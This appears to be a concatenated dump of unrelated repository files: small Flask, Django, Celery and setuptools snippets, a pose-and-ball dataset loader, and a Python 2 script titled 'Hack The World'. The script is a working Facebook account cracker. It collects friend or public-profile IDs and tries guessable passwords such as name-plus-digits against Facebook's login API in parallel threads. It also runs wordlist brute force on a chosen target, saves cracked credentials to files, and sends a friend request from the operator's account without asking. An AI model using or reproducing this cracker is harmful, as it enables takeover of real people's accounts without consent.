def new_post():
form = PostForm()
if session is None:
flash('Your need to login', 'error')
return redirect(url_for('home'))
if form.validate_on_submit():
title = request.form['title']
content = request.form['content']
message = Post(title=title, content=content)
db.session.add(message)
db.session.commit()
flash('Your Post has been Created!', 'success')
return redirect(url_for('home'))
return render_template('create_post.html', title='New Post', form=form, userinfo=session['profile'])
| [
"Amajimoda@bob-2.local"
] | Amajimoda@bob-2.local |
9e95bff67fee864bd8a59334a7809bc25385125f | 0032cbd2d47227620083d3b963fc76e9045e733e | /ENV/bin/easy_install | 192569c2a025cd6b5a1a529e7dc59f8e4f1031a4 | [] | no_license | xiangzhuyuan/python-getting-started | 38397a0b3339c3e184251c110c8da2abe035be66 | 30456abaa7bcbec0dd84e1037fae7de520c7e54e | refs/heads/master | 2020-04-08T16:19:42.006471 | 2015-03-13T10:28:22 | 2015-03-13T10:28:22 | 32,149,683 | 0 | 0 | null | 2015-03-13T10:25:15 | 2015-03-13T10:25:15 | Python | UTF-8 | Python | false | false | 288 | #!/Users/zhuyuan.xiang/workspace/python-getting-started/ENV/bin/python2.7
# -*- coding: utf-8 -*-
import re
import sys
from setuptools.command.easy_install import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"xiangzhuyuan@gmail.com"
] | xiangzhuyuan@gmail.com | |
93af07926b81a28d66ba3b60bbd5a801aaf3a4f8 | f572f48682e4efebac8d5102e51cb62da5caa7c9 | /geekshop/urls.py | d1799be21a399ea0cfd29e1cb128918a101a7363 | [] | no_license | cheef78/Django_basic | 4ac9c6fdcd9dc8775e16fe01c7c8799e207a22dc | 1e6771265769ce4a6295953d97c5c78ed2a3737b | refs/heads/master | 2023-04-11T12:54:45.085481 | 2021-03-13T11:04:04 | 2021-03-13T11:04:04 | 342,874,905 | 0 | 0 | null | 2021-04-25T21:37:13 | 2021-02-27T14:24:24 | CSS | UTF-8 | Python | false | false | 1,329 | py | """geekshop URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.1/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path
from mainapp import views as mainapp
urlpatterns = [
path('', mainapp.main, name = 'main'),
path('products/', mainapp.products, name = 'products'),
path('contact/', mainapp.contact, name = 'contact'),
path('products/all', mainapp.products, name = 'products_all'),
path('products/home', mainapp.products, name = 'products_home'),
path('products/modern', mainapp.products, name = 'products_modern'),
path('products/office', mainapp.products, name = 'products_office'),
path('products/classic', mainapp.products, name = 'products_classic'),
path('admin/', admin.site.urls, name = 'admin'),
]
| [
"suslovoleg@mail.ru"
] | suslovoleg@mail.ru |
b2617614628599bfb4b9f00487c546159e392f55 | e663909cec3c4eda12bb705fce9a6dc901bb7d88 | /爬虫/day12 celery/案例/定时任务的使用/tasks.py | 4c40c0aff2ac3b0e98d732cc5040744ae7ff06b3 | [] | no_license | 1284753334/learning2 | a03f293965a652883503cae420d8b1ad11ae6661 | f2fcb3c856656cc8427768b41add3ee083487592 | refs/heads/master | 2023-01-30T23:18:26.951210 | 2020-12-20T15:57:18 | 2020-12-20T15:57:18 | 315,065,804 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 461 | py | from celery import Celery
from celery import Task
app = Celery('tasks', backend='redis://:123456@127.0.0.1:6379/2',
broker='redis://:123456@127.0.0.1:6379/2')
app.config_from_object('celery_config')
@app.task(bind=True)
def period_task(self):
print('period task done: {0}'.format(self.request.id))
# 运行work
# celery -A tasks worker -l info -P eventlet
# 运行定时的模块 .bat 启动任务 任务会自动执行
# celery -A tasks beat
| [
"huapenghui@git.com"
] | huapenghui@git.com |
19ba8b35b07bdc9012a35b15b743cab393e138f8 | aff5b9799f52925318ab47dd8b35db57d8c0a5b6 | /untitled.txt | 08261242a88b5cdb918ff12d858a1ab555e014ae | [] | no_license | Fiaz420/Kalahacker | a2c416b29e0f347fce19548dd98edb3219e7000d | 6feaf27b8a55fa464c6ab7093c254082f3bbcb61 | refs/heads/main | 2023-05-14T02:01:56.760616 | 2021-05-25T06:49:05 | 2021-05-25T06:49:05 | 370,476,729 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 21,942 | txt | #!/usr/bin/python2
#coding=utf-8
import os,sys,time,datetime,random,hashlib,re,threading,json,urllib,cookielib,requests,mechanize
from multiprocessing.pool import ThreadPool
from requests.exceptions import ConnectionError
from mechanize import Browser
reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(),max_time=1)
br.addheaders = [('User-Agent', 'Opera/9.80 (Android; Opera Mini/32.0.2254/85. U; id) Presto/2.12.423 Version/12.16')]
def keluar():
print "\033[1;96m[!] \x1b[1;91mExit"
os.sys.exit()
def acak(b):
w = 'ahtdzjc'
d = ''
for i in x:
d += '!'+w[random.randint(0,len(w)-1)]+i
return cetak(d)
def cetak(b):
w = 'ahtdzjc'
for i in w:
j = w.index(i)
x= x.replace('!%s'%i,'\033[%s;1m'%str(31+j))
x += '\033[0m'
x = x.replace('!0','\033[0m')
sys.stdout.write(x+'\n')
def jalan(z):
for e in z + '\n':
sys.stdout.write(e)
sys.stdout.flush()
time.sleep(00000.1)
#### LOGO ####
logo = """
\033[1;91mGHURANI
\033[1;91m
\033[1;92mUpdated ⭐⚡
\033[1;92m
\033[1;93m
\033[1;93m
\033[1;93mGHURANI🔥╭╬──────────────────────────────────╬╮🔥
\033[0;94m ⚡ ✯ 𝕮𝖗𝖊𝖆𝖙𝖔𝖗 ✪ 𝕸𝖗. FIAZ ✬⚡
\033[0;94m ⚡ ✯ 𝖄𝖔𝖚𝖙𝖚𝖇𝖊 ✪ NOT ✬⚡
\033[0;97m ⚡ ✯ 𝕴𝖒 𝖓ø𝖙 𝖗𝖊𝖘𝖕𝖔𝖓𝖘𝖎𝖇𝖑𝖊 𝖋𝖔𝖗 𝖆𝖓𝖞 𝖒𝖎𝖘𝖘 𝖚𝖘𝖊 ✬⚡
\033[1;93m🔥╰╬──────────────────────────────────╬╯🔥 """
def tik():
titik = ['. ','.. ','... ']
for o in titik:
print("\r\x1b[1;93mPlease Wait \x1b[1;93m"+o),;sys.stdout.flush();time.sleep(1)
back = 0
berhasil = []
cekpoint = []
oks = []
id = []
listgrup = []
vulnot = "\033[31mNot Vuln"
vuln = "\033[32mVuln"
os.system("clear")
print """
\033[1;97mGHURANI
\033[1;97mVIRSON 0.2⚡
\033[1;97mGHURANI
\033[1;97mGHURANI
\033[1;97mGHURANI
\033[1;97mGHURANI
jalan("\033[1;96m•◈•────────────•◈•\033[1;99mFIAZ\033[1;99m•◈•────────────•◈•")
jalan("\033[1;96m ___ _ __ __ _ ___ ___ ")
jalan("\033[1;96m / _/| | /__\ | \| || __|| _ \ CLONE ALL COUNTRY")
jalan("\033[1;96m| \__| |_| \/ || | ' || _| | v / ")
jalan("\033[1;96m \__/|___|\__/ |_|\__||___||_|_\ ")
jalan("\033[1;97m INDIAN USER USE ANY PROXY TO CLONE")
jalan("\033[1;97m WIFI USER USE ANY PROXY TO CLONE")
jalan("\033[1;93m Welcome to FIAZ Creations")
jalan("\033[1;96m•◈•──────────•◈•\033[1;96mKalaNiazi\033[1;96m•◈•──────────•◈•")
CorrectUsername = "Fiaz"
CorrectPassword = "Ghurani"
loop = 'true'
while (loop == 'true'):
username = raw_input("\033[1;97m📋 \x1b[1;95mENTER USER\x1b[1;97m»» \x1b[1;97m")
if (username == CorrectUsername):
password = raw_input("\033[1;97m🗝 \x1b[1;95mENTER PASSWORD\x1b[1;97m»» \x1b[1;97m")
if (password == CorrectPassword):
print "Logged in successfully as " + username #Dev:RANA
time.sleep(2)
loop = 'false'
else:
print "\033[1;96mWrong Password"
os.system('xdg-open https://m.youtube.com/channel/UCsdJQbRf0xpvwaDu1rqgJuA')
else:
print "\033[1;96mWrong Username"
os.system('xdg-open https://m.youtube.com/channel/UCsdJQbRf0xpvwaDu1rqgJuA')
def login():
os.system('clear')
try:
toket = open('login.txt','r')
menu()
except (KeyError,IOError):
os.system('clear')
print logo
print 42*"\033[1;96m="
print('\033[1;96m[⚡] \x1b[1;93mLogin your new id \x1b[1;93m[⚡]' )
id = raw_input('\033[1;963m[+] \x1b[0;34mEnter ID/Email \x1b[1;93m: \x1b[1;93m')
pwd = raw_input('\033[1;93m[+] \x1b[0;34mEnter Password \x1b[1;93m: \x1b[1;93m')
tik()
try:
br.open('https://m.facebook.com')
except mechanize.URLError:
print"\n\033[1;96m[!] \x1b[1;91mTidak ada koneksi"
keluar()
br._factory.is_html = True
br.select_form(nr=0)
br.form['email'] = id
br.form['pass'] = pwd
br.submit()
url = br.geturl()
if 'save-device' in url:
try:
sig= 'api_key=882a8490361da98702bf97a021ddc14dcredentials_type=passwordemail='+id+'format=JSONgenerate_machine_id=1generate_session_cookies=1locale=en_USmethod=auth.loginpassword='+pwd+'return_ssl_resources=0v=1.062f8ce9f74b12f84c123cc23437a4a32'
data = {"api_key":"882a8490361da98702bf97a021ddc14d","credentials_type":"password","email":id,"format":"JSON", "generate_machine_id":"1","generate_session_cookies":"1","locale":"en_US","method":"auth.login","password":pwd,"return_ssl_resources":"0","v":"1.0"}
x=hashlib.new("md5")
x.update(sig)
a=x.hexdigest()
data.update({'sig':a})
url = "https://api.facebook.com/restserver.php"
r=requests.get(url,params=data)
z=json.loads(r.text)
unikers = open("login.txt", 'w')
unikers.write(z['access_token'])
unikers.close()
print '\n\033[1;96m[✓] \x1b[1;92mLogin Hogai'
os.system('xdg-open https://www.youtube.com/channel/UCsdJQbRf0xpvwaDu1rqgJuA')
requests.post('https://graph.facebook.com/me/friends?method=post&uids=gwimusa3&access_token='+z['access_token'])
menu()
except requests.exceptions.ConnectionError:
print"\n\033[1;96m[!] \x1b[1;91mTidak ada koneksi"
keluar()
if 'checkpoint' in url:
print("\n\033[1;96m[!] \x1b[1;91mAisa lagta hai apka account checkpoint pe hai")
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
else:
print("\n\033[1;96m[!] \x1b[1;91mPassword/Email ghalat hai")
os.system('rm -rf login.txt')
time.sleep(1)
login()
def menu():
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
os.system('clear')
print"\x1b[1;91m[!] Token invalid"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
otw = requests.get('https://graph.facebook.com/me?access_token='+toket)
a = json.loads(otw.text)
nama = a['name']
id = a['id']
ots = requests.get('https://graph.facebook.com/me/subscribers?access_token=' + toket)
b = json.loads(ots.text)
sub = str(b['summary']['total_count'])
except KeyError:
os.system('clear')
print"\033[1;91mYour Account is on Checkpoint"
os.system('rm -rf login.txt')
time.sleep(1)
login()
except requests.exceptions.ConnectionError:
print"\x1b[1;92mThere is no internet connection"
keluar()
os.system("clear")
print logo
print " \033[1;36;40m ╔═════════════════════════════════╗"
print " \033[1;36;40m ║\033[1;32;40m[*] Name\033[1;32;40m: "+nama+" \033[1;36;40m║"
print " \033[1;36;40m ║\033[1;33;40m[*] ID \033[1;34;40m: "+id+" \033[1;36;40m║"
print " \033[1;36;40m ║\033[1;36;40m[*] Subs\033[1;34;40m: "+sub+" \033[1;36;40m║"
print " \033[1;36;40m ╚═════════════════════════════════╝"
print "\033[1;32;40m[1] \033[1;33;41mHack The World"
print "\033[1;32;40m[2] \033[1;33;42mUpdate FIAZ"
print "\033[1;32;40m[0] \033[1;33;43mLog out"
pilih()
def pilih():
unikers = raw_input("\n\033[1;31;40m>>> \033[1;35;40m")
if unikers =="":
print "\x1b[1;91mFill in correctly"
pilih()
elif unikers =="1":
super()
elif unikers =="2":
os.system('clear')
print logo
print " \033[1;36;40m●════════════════════════◄►════════════════════════●\n"
os.system('git pull origin master')
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu()
elif unikers =="0":
jalan('Token Removed')
os.system('rm -rf login.txt')
keluar()
else:
print "\x1b[1;91mFill in correctly"
pilih()
def super():
global toket
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
print"\x1b[1;91mToken invalid"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print "\x1b[1;32;40m[type1] \033[1;33;41mHack From Friend List"
print "\x1b[1;32;40m[type2] \033[1;33;42mHack From Public ID"
print "\x1b[1;32;40m[type3] \033[1;33;43mHack Bruteforce"
print "\x1b[1;32;40m[type4] \033[1;33;44mHack From File"
print "\x1b[1;32;40m[type0] \033[1;33;45mBack"
pilih_super()
def pilih_super():
peak = raw_input("\n\033[1;31;40m>>> \033[1;97m")
if peak =="":
print "\x1b[1;91mFill in correctly"
pilih_super()
elif peak =="1":
os.system('clear')
print logo
jalan('\033[1;93m[✺] Getting IDs \033[1;97m...')
r = requests.get("https://graph.facebook.com/me/friends?access_token="+toket)
z = json.loads(r.text)
for s in z['data']:
id.append(s['id'])
elif peak =="2":
os.system('clear')
print logo
idt = raw_input("\033[1;96m[*] Enter ID : ")
try:
jok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
op = json.loads(jok.text)
print"\033[1;31;40m[✺] Name : "+op["name"]
except KeyError:
print"\x1b[1;92m[✺] ID Not Found!"
raw_input("\n\033[1;96m[\033[1;94mBack\033[1;96m]")
super()
print"\033[1;35;40m[✺] Getting IDs..."
r = requests.get("https://graph.facebook.com/"+idt+"/friends?access_token="+toket)
z = json.loads(r.text)
for i in z['data']:
id.append(i['id'])
elif peak =="3":
os.system('clear')
print logo
brute()
elif peak =="4":
os.system('clear')
print logo
try:
idlist = raw_input('\x1b[1;91m[+] \x1b[1;93mEnter File Path \x1b[1;91m: \x1b[1;93m')
for line in open(idlist,'r').readlines():
id.append(line.strip())
except IOError:
print '\x1b[1;96m[!] \x1b[1;91mFile Not Found'
raw_input('\n\x1b[1;96m[ \x1b[1;97mBack \x1b[1;91m]')
super()
elif peak =="0":
menu()
else:
print "\033[1;96m[!] \x1b[1;91mFill in correctly"
pilih_super()
print "\033[1;96m[+] \033[1;93mTotal IDs \033[1;91m: \033[1;97m"+str(len(id))
jalan('\033[1;96m[✺] \033[1;93mStarting \033[1;97m...')
titik = ['. ','.. ','... ']
for o in titik:
print("\r\033[1;96m[\033[1;97m✸\033[1;96m] \033[1;93mCracking \033[1;97m"+o),;sys.stdout.flush();time.sleep(1)
print
print('\x1b[1;96m[!] \x1b[1;93mTo Stop Process Press CTRL Then Press z')
print 42*"\033[1;96m="
def main(arg):
global cekpoint,oks
user = arg
try:
os.mkdir('out')
except OSError:
pass
try:
a = requests.get('https://graph.facebook.com/'+user+'/?access_token='+toket)
b = json.loads(a.text)
pass1 = b['first_name'] + '786'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass1)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;92m[OK] \x1b[1;92m ' + user + ' \x1b[1;92m | \x1b[1;92m ' + pass1 + ' ⚡ ' + b['name']
oks.append(user+pass1)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;36;40m[HACKED] \x1b[1;97m ' + user + ' \x1b[1;36;40m|\x1b[1;97m ' + pass1 + ' ⚡ ' + b['name']
cek = open("out/CP.txt", "a")
cek.write(user+"|"+pass1+"\n")
cek.close()
cekpoint.append(user+pass1)
else:
pass2 = b['first_name'] + '123'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass2)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;92m[OK] \x1b[1;92m ' + user + ' \x1b[1;92m | \x1b[1;92m ' + pass2 + ' ⚡ ' + b['name']
oks.append(user+pass2)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;36;40m[HACKED] \x1b[1;97m ' + user + ' \x1b[1;36;40m|\x1b[1;97m ' + pass2 + ' ⚡ ' + b['name']
cek = open("out/CP.txt", "a")
cek.write(user+"|"+pass2+"\n")
cek.close()
cekpoint.append(user+pass2)
else:
pass3 = b['first_name'] + '12345'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass3)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;92m[OK] \x1b[1;92m ' + user + ' \x1b[1;92m | \x1b[1;92m ' + pass3 + ' ⚡ ' + b['name']
oks.append(user+pass3)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;36;40m[HACKED] \x1b[1;97m ' + user + ' \x1b[1;36;40m|\x1b[1;97m ' + pass3 + ' ⚡ ' + b['name']
cek = open("out/CP.txt", "a")
cek.write(user+"|"+pass3+"\n")
cek.close()
cekpoint.append(user+pass4)
else:
pass4 = b['first_name'] + '1234'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass4)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;92m[OK] \x1b[1;92m ' + user + ' \x1b[1;92m | \x1b[1;92m ' + pass4 + ' ⚡ ' + b['name']
oks.append(user+pass4)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;36;40m[HACKED] \x1b[1;97m ' + user + ' \x1b[1;36;40m|\x1b[1;97m ' + pass4 + ' ⚡ ' + b['name']
cek = open("out/CP.txt", "a")
cek.write(user+"|"+pass4+"\n")
cek.close()
cekpoint.append(user+pass4)
else:
pass5 = '786786'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass5)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;92m[OK] \x1b[1;92m ' + user + ' \x1b[1;36;40m|\x1b[1;92m ' + pass5 + ' ⚡ ' + b['name']
oks.append(user+pass5)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;36;40m[HACKED] \x1b[1;97m ' + user + ' \x1b[1;36;40m|\x1b[1;97m ' + pass5 + ' ⚡ ' + b['name']
cek = open("out/CP.txt", "a")
cek.write(user+"|"+pass5+"\n")
cek.close()
cekpoint.append(user+pass5)
else:
pass6 = b['last_name'] + '123'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass6)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;92m[OK] \x1b[1;92m ' + user + ' \x1b[1;36;40m|\x1b[1;92m ' + pass6 + ' ⚡ ' + b['name']
oks.append(user+pass6)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;36;40m[HACKED] \x1b[1;97m ' + user + ' \x1b[1;36;40m|\x1b[1;97m ' + pass6 + ' ⚡ ' + b['name']
cek = open("out/CP.txt", "a")
cek.write(user+"|"+pass6+"\n")
cek.close()
cekpoint.append(user+pass6)
else:
pass7 = 'Pakistan'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass7)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;92m[OK] \x1b[1;92m ' + user + ' \x1b[1;36;40m|\x1b[1;92m ' + pass7 + ' ⚡ ' + b['name']
oks.append(user+pass7)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;36;40m[HACKED] \x1b[1;97m ' + user + ' \x1b[1;36;40m|\x1b[1;97m ' + pass7 + ' ⚡ ' + b['name']
cek = open("out/CP.txt", "a")
cek.write(user+"|"+pass7+"\n")
cek.close()
cekpoint.append(user+pass7)
except:
pass
p = ThreadPool(30)
p.map(main, id)
print '\033[1;31;40m[✓] Process Has Been Completed\033[1;96m....'
print "\033[1;32;40m[+] Total OK/\x1b[1;93mCP \033[1;91m: \033[1;91m"+str(len(oks))+"\033[1;31;40m/\033[1;36;40m"+str(len(cekpoint))
print '\033[1;34;40m[+] CP File Has Been Saved : save/cp.txt'
print """
\033[1;31;40m ●════════════════════════◄►════════════════════════●
"""
raw_input("\n\033[1;96m[\033[1;97mExit\033[1;96m]")
super()
def brute():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(0.5)
login()
else:
os.system('clear')
print logo
print '\033[1;31;40m ●════════════════════════◄►════════════════════════●'
try:
email = raw_input('\x1b[1;91m[+] \x1b[1;92mID\x1b[1;97m/\x1b[1;92mEmail \x1b[1;97mTarget \x1b[1;91m:\x1b[1;97m ')
passw = raw_input('\x1b[1;91m[+] \x1b[1;92mWordlist \x1b[1;97mext(list.txt) \x1b[1;91m: \x1b[1;97m')
total = open(passw, 'r')
total = total.readlines()
print '\033[1;31;40m ●════════════════════════◄►════════════════════════●'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mTarget \x1b[1;91m:\x1b[1;97m ' + email
print '\x1b[1;91m[+] \x1b[1;92mTotal\x1b[1;96m ' + str(len(total)) + ' \x1b[1;92mPassword'
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
sandi = open(passw, 'r')
for pw in sandi:
try:
pw = pw.replace('\n', '')
sys.stdout.write('\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mTry \x1b[1;97m' + pw)
sys.stdout.flush()
data = requests.get('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + email + '&locale=en_US&password=' + pw + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
mpsh = json.loads(data.text)
if 'access_token' in mpsh:
dapat = open('Brute.txt', 'w')
dapat.write(email + ' | ' + pw + '\n')
dapat.close()
print '\n\x1b[1;91m[+] \x1b[1;92mFounded.'
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername \x1b[1;91m:\x1b[1;97m ' + email
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword \x1b[1;91m:\x1b[1;97m ' + pw
keluar()
else:
if 'www.facebook.com' in mpsh['error_msg']:
ceks = open('Brutecekpoint.txt', 'w')
ceks.write(email + ' | ' + pw + '\n')
ceks.close()
print '\n\x1b[1;91m[+] \x1b[1;92mFounded.'
print "\033[1;36;40m ●════════════════════════◄►════════════════════════●"
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername \x1b[1;91m:\x1b[1;97m ' + email
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword \x1b[1;91m:\x1b[1;97m ' + pw
keluar()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[!] Connection Error'
time.sleep(1)
except IOError:
print '\x1b[1;91m[!] File not found...'
print """\n\x1b[1;91m[!] \x1b[1;92mLooks like you don't have a wordlist"""
super()
if __name__ == '__main__':
login()
| [
"noreply@github.com"
] | Fiaz420.noreply@github.com |
d38154eb5737c5199a7f395ef72609068dab38b3 | 90bec950082b4c12c5ef96ff3aec07ac1c89e3be | /1.py | 544bf46e803586117686d6ba615f9ab4299d5945 | [] | no_license | kzhgun/coursera_py_hse | 2a3cbdddbe8f8d43cae5e4ce1ad553be212f1747 | 0884e446a419ed026d80532250870fd4d16f13c1 | refs/heads/master | 2022-11-15T10:13:19.478572 | 2020-07-08T18:55:41 | 2020-07-08T18:55:41 | 261,000,252 | 0 | 0 | null | 2020-05-03T19:14:37 | 2020-05-03T19:00:23 | Python | UTF-8 | Python | false | false | 273 | py | input()
a = list(map(float, input().split()))
n = int(input())
def func(a1):
summ = 0
for i in range(n):
q, p = map(int, input().split())
for el in a1[q:p + 1]:
summ += 1 / el
print("{0:.6f}".format((p - q + 1) / summ))
func(a)
| [
"zhgunksenia@gmail.com"
] | zhgunksenia@gmail.com |
e13655cec855a0e54a334077cef0693f13d2836a | 75485f3371f5f3c786e021b2657c6750120a5d09 | /PoseBallRelationDataset.py | 8bffe4a45869e1bfec02eccfbc4f179b7e605858 | [] | no_license | icicle4/PoseObjRelation | af0b138072e04d8d71d913ae1751b7dbe32bbbbe | 4f55f8bed99663181ec03e9a27575e33a5459418 | refs/heads/master | 2020-11-28T01:21:47.133144 | 2019-12-23T03:15:53 | 2019-12-23T03:15:53 | 229,667,812 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,415 | py | import json
from itertools import groupby
import cv2
import os
import numpy as np
import torch
from torch_geometric.data import Data, DataLoader
from util_tools.util import center_bbox, draw_skeleton_in_frame, draw_box_in_frame, area
import random
def relation_mask_visualization(image, related_mask, kp, human_box):
emphasis_image_part = cv2.bitwise_and(
image, image, mask=related_mask.astype(np.uint8)
)
image = cv2.addWeighted(image, 0.5, emphasis_image_part, 0.5, 1)
image = draw_skeleton_in_frame(image, np.array(kp)[:, :2])
image = draw_box_in_frame(image, human_box)
return image
def return_dataset(cfg):
train_dataset = PoseBallRelationDataset(os.path.join(cfg.data_path,
'sports_ball_action_{}.json'.format('train'))).datas
test_dataset = PoseBallRelationDataset(os.path.join(cfg.data_path,
'sports_ball_action_{}.json'.format('test'))).datas
print('train sample: {}'.format(len(train_dataset)))
print('test sample: {}'.format(len(test_dataset)))
return train_dataset, test_dataset
class PoseBallRelationDataset:
def __init__(self, json_path, stride=4):
self.stride = stride
self.json_path = json_path
self.load_json()
self.transform_to_possible_format()
def load_json(self):
with open(self.json_path, 'r') as f:
annotations = json.load(f)
self.annotations = annotations
def fill_mask(self, mask, box, method):
if method == 'gaussian':
center = center_bbox(box)
pass
elif method == 'fill':
xmin, ymin, xmax, ymax = box
mask[ymin: ymax + 1, xmin: xmax + 1] = 1.0
else:
raise NotImplementedError('coming soon')
return mask
def group_same_connection(self, connections_with_action_id):
new_connections = list()
for c, v in groupby(connections_with_action_id, key=lambda x: x[0]):
new_connections.append(
c
)
return new_connections
def related_vec(self, kp, human_box, related_pos):
kp = np.asarray(kp, dtype=np.float32)
human_area = area(human_box)
human_radius = human_area ** 0.5
related_x, related_y = related_pos
kp[:, 0] -= related_x
kp[:, 1] -= related_y
kp[:, :2] /= human_radius
return kp
def transform_to_relate_vec(self, related_mask, stride):
height, width = related_mask.shape[:2]
positive_positions, negative_positions = list(), list()
for h in range(0, height, stride):
for w in range(0, width, stride):
if related_mask[h, w] == 1.0:
positive_positions.append((w, h))
else:
negative_positions.append((w, h))
return positive_positions, negative_positions
def balance_vecs(self, positive_vecs, negative_vecs):
if len(negative_vecs) > 1.8 * len(positive_vecs):
N = len(positive_vecs)
M = len(negative_vecs)
sample_inds = random.sample(list(range(0, M)), N)
sampled_negative_vecs = [
negative_vecs[i] for i in sample_inds
]
return positive_vecs, sampled_negative_vecs
if len(positive_vecs) > 1.8 * len(negative_vecs):
N = len(positive_vecs)
M = len(negative_vecs)
sample_inds = random.sample(list(range(0, N)), M)
sampled_positive_vecs = [
positive_vecs[i] for i in sample_inds
]
return sampled_positive_vecs, negative_vecs
return positive_vecs, negative_vecs
def graph_data_handle(self, vecs, class_id):
x = torch.from_numpy(vecs).float()
y = torch.tensor([class_id]).long()
edge_index = torch.tensor(
[[0, 1, 0, 2, 5, 5, 7, 6, 8, 5, 6, 11, 11, 12, 13, 14,
1, 3, 2, 4, 6, 7, 9, 8, 10, 11, 12, 12, 13, 14, 15, 16],
[1, 3, 2, 4, 6, 7, 9, 8, 10, 11, 12, 12, 13, 14, 15, 16,
0, 1, 0, 2, 5, 5, 7, 6, 8, 5, 6, 11, 11, 12, 13, 14]
], dtype=torch.long
)
return Data(x=x, edge_index=edge_index, y=y)
def transform_to_possible_format(self):
all_positive_datas = []
all_negative_datas = []
for file_name, ann in self.annotations.items():
kps = ann['kps']
objs = ann['obj_boxs']
human_boxs = ann['human_boxs']
for i, kp in enumerate(kps):
if kp is None:
continue
else:
image = cv2.imread(file_name)
height, width = image.shape[:2]
related_mask = np.zeros((height, width), dtype=np.float32)
connection_with_action = ann['connection_with_action']
new_connections = self.group_same_connection(connection_with_action)
human_box = human_boxs[i]
for c in new_connections:
human_ind, obj_ind = c
if human_ind == i:
